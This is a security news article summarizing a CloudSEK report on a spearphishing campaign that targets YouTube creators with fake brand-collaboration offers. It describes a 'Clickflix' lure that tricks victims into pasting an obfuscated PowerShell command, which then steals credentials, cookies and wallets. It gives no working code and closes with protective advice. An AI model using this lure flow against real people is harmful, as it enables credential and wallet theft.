do son 
malware campaign | Image: CloudSEK
A new report from CloudSEK highlights a sophisticated malware campaign targeting YouTube content creators through spearphishing tactics. The attackers are leveraging trusted brand names and offers of professional collaborations to deliver malicious payloads, employing a novel “Clickflix” technique to enhance their deception.
The report reveals that threat actors are sending phishing emails disguised as promotional materials, contracts, or business proposals to YouTube creators. These emails contain malicious attachments, such as Word documents, PDFs, or Excel files, which serve as the initial infection vector. According to the report, “The email subject lines and content are meticulously designed to mimic legitimate business opportunities, such as promotions, partnership proposals, and marketing collaborations“.
The attack hinges on social engineering, tricking victims into copying and pasting PowerShell scripts that execute malware on their systems. Once activated, this malware can steal browser data, including login credentials, cookies, and digital wallets, or grant remote access to the attackers. The report emphasizes that “This campaign specifically exploits YouTube creators’ interest in brand deals and partnerships to increase its effectiveness“.
CloudSEK’s Threat Research team uncovered a specific instance of this campaign where threat actors impersonated the popular video creation platform, Pictory, and their professional collaboration offers. The attackers sent emails with subject lines like “Re: Terms explanation,” proposing brand collaborations and attaching what appeared to be payment forms.
The report details the “Clickflix” technique, explaining that after the victim clicks on a link in the email, they are directed to a Google document. This document then prompts them to open a “Wire-transfer form” in a Word file. Interestingly, the threat actor created a fake Microsoft webpage that closely resembles Microsoft Word. This page displays an error message stating that the “Word Online” extension is not installed and presents options to “How to fix” or “Auto-fix”.
Clicking the “How to fix” button copies a base64-encoded PowerShell command to the computer’s clipboard. The page then instructs the target to open a PowerShell terminal and right-click the console window, which pastes and executes the malicious PowerShell script. The report notes that “Right-clicking a terminal window pasted the content of the clipboard and executed the PowerShell“.
The executed PowerShell script is heavily obfuscated and designed to manipulate browser behavior. It ultimately downloads a malicious payload, establishes persistence through a scheduled job, and communicates with command and control (C2) servers to exfiltrate stolen data.
While the report acknowledges that targeting YouTube creators is not a new tactic, it highlights that “the use of the Clickflix technique represents a new advancement that requires further investigation”. This campaign demonstrates the evolving sophistication of cyberattacks and the importance of vigilance for online content creators.
To protect themselves, YouTube creators should be wary of unsolicited emails offering brand deals or collaborations, especially those containing attachments or links. It is crucial to verify the legitimacy of such offers through official channels and to avoid copying and pasting commands from untrusted sources.
Related Posts:
- A malware that targets Bitcoin has infected 2.3 million users
- Google Pays $10,633 for YouTube Security Vulnerabilities
- Beware of Instagram Influencer Scams: McAfee Labs Exposes New Threat
- YouTube Podcasts Hit 1 Billion: Audio & Video Revolution
- Threat Actors Exploit Fake Brand Collaborations to Target YouTube Channels
